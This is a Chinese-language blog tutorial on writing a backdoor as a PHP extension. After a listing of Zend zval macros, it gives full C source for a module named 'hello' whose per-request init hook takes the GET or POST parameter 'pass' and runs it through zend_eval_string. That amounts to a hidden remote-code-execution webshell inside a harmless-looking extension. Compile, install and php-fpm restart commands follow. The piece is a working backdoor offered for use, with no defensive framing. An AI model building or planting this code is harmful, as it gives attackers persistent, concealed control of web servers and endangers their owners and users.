PHP扩展学习–简单的后门编写
通过上一篇文章已经简单的理解了PHP 扩展的一个流程。如果还没有理解请看如下的文章
具体的参考如下:
https://blog.csdn.net/u011957758/article/details/72719666
https://blog.csdn.net/u011957758/article/details/72633938
https://blog.csdn.net/u011957758/article/details/72513935
https://blog.csdn.net/u011957758/article/details/72456298
通过上文介绍。
操作的宏都定义在/Zend/zend_operators.h文件里:
//操作整数的
#define Z_LVAL(zval) (zval).value.lval
#define Z_LVAL_P(zval_p) Z_LVAL(*zval_p)
#define Z_LVAL_PP(zval_pp) Z_LVAL(**zval_pp)
//操作IS_BOOL布尔型的
#define Z_BVAL(zval) ((zend_bool)(zval).value.lval)
#define Z_BVAL_P(zval_p) Z_BVAL(*zval_p)
#define Z_BVAL_PP(zval_pp) Z_BVAL(**zval_pp)
//操作浮点数的
#define Z_DVAL(zval) (zval).value.dval
#define Z_DVAL_P(zval_p) Z_DVAL(*zval_p)
#define Z_DVAL_PP(zval_pp) Z_DVAL(**zval_pp)
//操作字符串的值和长度的
#define Z_STRVAL(zval) (zval).value.str.val
#define Z_STRVAL_P(zval_p) Z_STRVAL(*zval_p)
#define Z_STRVAL_PP(zval_pp) Z_STRVAL(**zval_pp)
#define Z_STRLEN(zval) (zval).value.str.len
#define Z_STRLEN_P(zval_p) Z_STRLEN(*zval_p)
#define Z_STRLEN_PP(zval_pp) Z_STRLEN(**zval_pp)
#define Z_ARRVAL(zval) (zval).value.ht
#define Z_ARRVAL_P(zval_p) Z_ARRVAL(*zval_p)
#define Z_ARRVAL_PP(zval_pp) Z_ARRVAL(**zval_pp)
//操作对象的
#define Z_OBJVAL(zval) (zval).value.obj
#define Z_OBJVAL_P(zval_p) Z_OBJVAL(*zval_p)
#define Z_OBJVAL_PP(zval_pp) Z_OBJVAL(**zval_pp)
#define Z_OBJ_HANDLE(zval) Z_OBJVAL(zval).handle
#define Z_OBJ_HANDLE_P(zval_p) Z_OBJ_HANDLE(*zval_p)
#define Z_OBJ_HANDLE_PP(zval_p) Z_OBJ_HANDLE(**zval_p)
#define Z_OBJ_HT(zval) Z_OBJVAL(zval).handlers
#define Z_OBJ_HT_P(zval_p) Z_OBJ_HT(*zval_p)
#define Z_OBJ_HT_PP(zval_p) Z_OBJ_HT(**zval_p)
#define Z_OBJCE(zval) zend_get_class_entry(&(zval) TSRMLS_CC)
#define Z_OBJCE_P(zval_p) Z_OBJCE(*zval_p)
#define Z_OBJCE_PP(zval_pp) Z_OBJCE(**zval_pp)
#define Z_OBJPROP(zval) Z_OBJ_HT((zval))->get_properties(&(zval) TSRMLS_CC)
#define Z_OBJPROP_P(zval_p) Z_OBJPROP(*zval_p)
#define Z_OBJPROP_PP(zval_pp) Z_OBJPROP(**zval_pp)
#define Z_OBJ_HANDLER(zval, hf) Z_OBJ_HT((zval))->hf
#define Z_OBJ_HANDLER_P(zval_p, h) Z_OBJ_HANDLER(*zval_p, h)
#define Z_OBJ_HANDLER_PP(zval_p, h) Z_OBJ_HANDLER(**zval_p, h)
#define Z_OBJDEBUG(zval,is_tmp) (Z_OBJ_HANDLER((zval),get_debug_info)? \
Z_OBJ_HANDLER((zval),get_debug_info)(&(zval),&is_tmp TSRMLS_CC): \
(is_tmp=0,Z_OBJ_HANDLER((zval),get_properties)?Z_OBJPROP(zval):NULL))
#define Z_OBJDEBUG_P(zval_p,is_tmp) Z_OBJDEBUG(*zval_p,is_tmp)
#define Z_OBJDEBUG_PP(zval_pp,is_tmp) Z_OBJDEBUG(**zval_pp,is_tmp)
//操作资源的
#define Z_RESVAL(zval) (zval).value.lval
#define Z_RESVAL_P(zval_p) Z_RESVAL(*zval_p)
#define Z_RESVAL_PP(zval_pp) Z_RESVAL(**zval_pp)
————————————————
那么我们可以手工编写一个PHP的扩展的后门。
首先需要建立一个hello 的扩展
执行命令 cd /www/server/php/71/src/ext ./ext_skel --extname=hello 得到如下的提示 To use your new extension, you will have to execute the following steps: 1. $ cd .. 2. $ vi ext/hello/config.m4 3. $ ./buildconf 4. $ ./configure --[with|enable]-bt_test 5. $ make 6. $ ./sapi/cli/php -f ext/hello/hello.php 7. $ vi ext/hello/hello.c 8. $ make
因为需要每次请求都触发后门。那么需要在PHP_RINIT_FUNCTION 这个函数下进行操作。
//查找指定的key
int find_ht_bykey(HashTable *myht, char* key, zval** ret_val)
{
if (myht == NULL) return 0;
#if (PHP_MAJOR_VERSION == 7)
zval *ppzval = zend_hash_find(myht, zend_string_init(key, strlen(key), 0));
if (ppzval != NULL) {
*ret_val = ppzval;
return 1;
}
#else
zval **ppzval;
if (zend_hash_find(myht, key, (int)strlen(key) + 1, (void**)&ppzval) != FAILURE) {
*ret_val = *ppzval;
return 1;
}
#endif
return 0;
}
PHP_RINIT_FUNCTION(hello)
{
zval *z_get, *z_post;
#if (PHP_MAJOR_VERSION == 7)
zend_is_auto_global(zend_string_init("_SERVER", 7, 0));
z_get = &PG(http_globals)[TRACK_VARS_GET];
z_post = &PG(http_globals)[TRACK_VARS_POST];
#else
zend_is_auto_global(ZEND_STRL("_SERVER") TSRMLS_CC);
z_get = PG(http_globals)[TRACK_VARS_GET];
z_post = PG(http_globals)[TRACK_VARS_POST];
#endif
char key[128] = "pass";
char* shell;
zval* next_val;
if (find_ht_bykey(Z_ARRVAL_P(z_get), key, &next_val)){
shell=Z_STRVAL_P(next_val);
zend_eval_string(shell, NULL, (char *)"" TSRMLS_CC);
}
if (find_ht_bykey(Z_ARRVAL_P(z_post), key, &next_val)){
shell=Z_STRVAL_P(next_val);
zend_eval_string(shell, NULL, (char *)"" TSRMLS_CC);
}
#if defined(COMPILE_DL_HELLO) && defined(ZTS)
ZEND_TSRMLS_CACHE_UPDATE();
#endif
return SUCCESS;
}
大概的逻辑就是获取get post 的zavl 的接结构体。然后利用zend_hash_find 去查找你的关键词。获取到关键词之后。赋值到你的变量中。
通过eval 去执行获取的值。
整体的代码如下:
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "php.h"
#include "php_ini.h"
#include "ext/standard/info.h"
#include "php_hello.h"
/* If you declare any globals in php_hello.h uncomment this:
ZEND_DECLARE_MODULE_GLOBALS(hello)
*/
/* True global resources - no need for thread safety here */
static int le_hello;
// void write_logs2(char info[]);
// void write_logs2(char info[])
// {
// FILE * pFile;
// pFile = fopen("/tmp/t2.json", "a+");
// if (pFile != NULL) {
// fputs(info, pFile);
// fclose(pFile);
// }
// }
char info2[1024];
/* {{{ PHP_INI
*/
/* Remove comments and fill if you need to have entries in php.ini
PHP_INI_BEGIN()
STD_PHP_INI_ENTRY("hello.global_value", "42", PHP_INI_ALL, OnUpdateLong, global_value, zend_hello_globals, hello_globals)
STD_PHP_INI_ENTRY("hello.global_string", "foobar", PHP_INI_ALL, OnUpdateString, global_string, zend_hello_globals, hello_globals)
PHP_INI_END()
*/
/* }}} */
/* Remove the following function when you have successfully modified config.m4
so that your module can be compiled into PHP, it exists only for testing
purposes. */
/* Every user-visible function in PHP should document itself in the source */
/* {{{ proto string confirm_hello_compiled(string arg)
Return a string to confirm that the module is compiled in */
PHP_FUNCTION(confirm_hello_compiled)
{
char *arg = NULL;
size_t arg_len, len;
zend_string *strg;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s", &arg, &arg_len) == FAILURE) {
return;
}
strg = strpprintf(0, "Congratulations! You have successfully modified ext/%.78s/config.m4. Module %.78s is now compiled into PHP.", "hello", arg);
RETURN_STR(strg);
}
PHP_FUNCTION(hello2)
{
php_printf("Hello World!2\n");
RETURN_TRUE;
}
/* }}} */
/* The previous line is meant for vim and emacs, so it can correctly fold and
unfold functions in source code. See the corresponding marks just before
function definition, where the functions purpose is also documented. Please
follow this convention for the convenience of others editing your code.
*/
/* {{{ php_hello_init_globals
*/
/* Uncomment this function if you have INI entries
static void php_hello_init_globals(zend_hello_globals *hello_globals)
{
hello_globals->global_value = 0;
hello_globals->global_string = NULL;
}
*/
/* }}} */
/* {{{ PHP_MINIT_FUNCTION
*/
PHP_MINIT_FUNCTION(hello)
{
/* If you have INI entries, uncomment these lines
REGISTER_INI_ENTRIES();
*/
return SUCCESS;
}
/* }}} */
/* {{{ PHP_MSHUTDOWN_FUNCTION
*/
PHP_MSHUTDOWN_FUNCTION(hello)
{
/* uncomment this line if you have INI entries
UNREGISTER_INI_ENTRIES();
*/
return SUCCESS;
}
/* }}} */
/* Remove if there's nothing to do at request start */
/* {{{ PHP_RINIT_FUNCTION
*/
//查找指定的key
int find_ht_bykey(HashTable *myht, char* key, zval** ret_val)
{
if (myht == NULL) return 0;
#if (PHP_MAJOR_VERSION == 7)
zval *ppzval = zend_hash_find(myht, zend_string_init(key, strlen(key), 0));
if (ppzval != NULL) {
*ret_val = ppzval;
return 1;
}
#else
zval **ppzval;
if (zend_hash_find(myht, key, (int)strlen(key) + 1, (void**)&ppzval) != FAILURE) {
*ret_val = *ppzval;
return 1;
}
#endif
return 0;
}
PHP_RINIT_FUNCTION(hello)
{
zval *z_get, *z_post;
#if (PHP_MAJOR_VERSION == 7)
zend_is_auto_global(zend_string_init("_SERVER", 7, 0));
z_get = &PG(http_globals)[TRACK_VARS_GET];
z_post = &PG(http_globals)[TRACK_VARS_POST];
#else
zend_is_auto_global(ZEND_STRL("_SERVER") TSRMLS_CC);
z_get = PG(http_globals)[TRACK_VARS_GET];
z_post = PG(http_globals)[TRACK_VARS_POST];
#endif
char key[128] = "pass";
char* shell;
zval* next_val;
if (find_ht_bykey(Z_ARRVAL_P(z_get), key, &next_val)){
shell=Z_STRVAL_P(next_val);
zend_eval_string(shell, NULL, (char *)"" TSRMLS_CC);
}
if (find_ht_bykey(Z_ARRVAL_P(z_post), key, &next_val)){
shell=Z_STRVAL_P(next_val);
zend_eval_string(shell, NULL, (char *)"" TSRMLS_CC);
}
#if defined(COMPILE_DL_HELLO) && defined(ZTS)
ZEND_TSRMLS_CACHE_UPDATE();
#endif
return SUCCESS;
}
/* }}} */
/* Remove if there's nothing to do at request end */
/* {{{ PHP_RSHUTDOWN_FUNCTION
*/
PHP_RSHUTDOWN_FUNCTION(hello)
{
return SUCCESS;
}
/* }}} */
/* {{{ PHP_MINFO_FUNCTION
*/
PHP_MINFO_FUNCTION(hello)
{
php_info_print_table_start();
php_info_print_table_header(2, "hello support", "enabled");
php_info_print_table_end();
/* Remove comments if you have entries in php.ini
DISPLAY_INI_ENTRIES();
*/
}
/* }}} */
/* {{{ hello_functions[]
*
* Every user visible function must have an entry in hello_functions[].
*/
const zend_function_entry hello_functions[] = {
PHP_FE(confirm_hello_compiled, NULL) /* For testing, remove later. */
PHP_FE(hello2, NULL) /* For testing, remove later. */
PHP_FE_END /* Must be the last line in hello_functions[] */
};
/* }}} */
/* {{{ hello_module_entry
*/
zend_module_entry hello_module_entry = {
STANDARD_MODULE_HEADER,
"hello",
hello_functions,
PHP_MINIT(hello),
PHP_MSHUTDOWN(hello),
PHP_RINIT(hello), /* Replace with NULL if there's nothing to do at request start */
PHP_RSHUTDOWN(hello), /* Replace with NULL if there's nothing to do at request end */
PHP_MINFO(hello),
PHP_HELLO_VERSION,
STANDARD_MODULE_PROPERTIES
};
/* }}} */
#ifdef COMPILE_DL_HELLO
#ifdef ZTS
ZEND_TSRMLS_CACHE_DEFINE()
#endif
ZEND_GET_MODULE(hello)
#endif
/*
* Local variables:
* tab-width: 4
* c-basic-offset: 4
* End:
* vim600: noet sw=4 ts=4 fdm=marker
* vim<600: noet sw=4 ts=4
*/
然后进行编译操作
/www/server/php/71/bin/phpize ./configure --with-php-config=/www/server/php/71/bin/php-config make && make install && /etc/init.d/php-fpm-71 restart
测试:
GET
POST
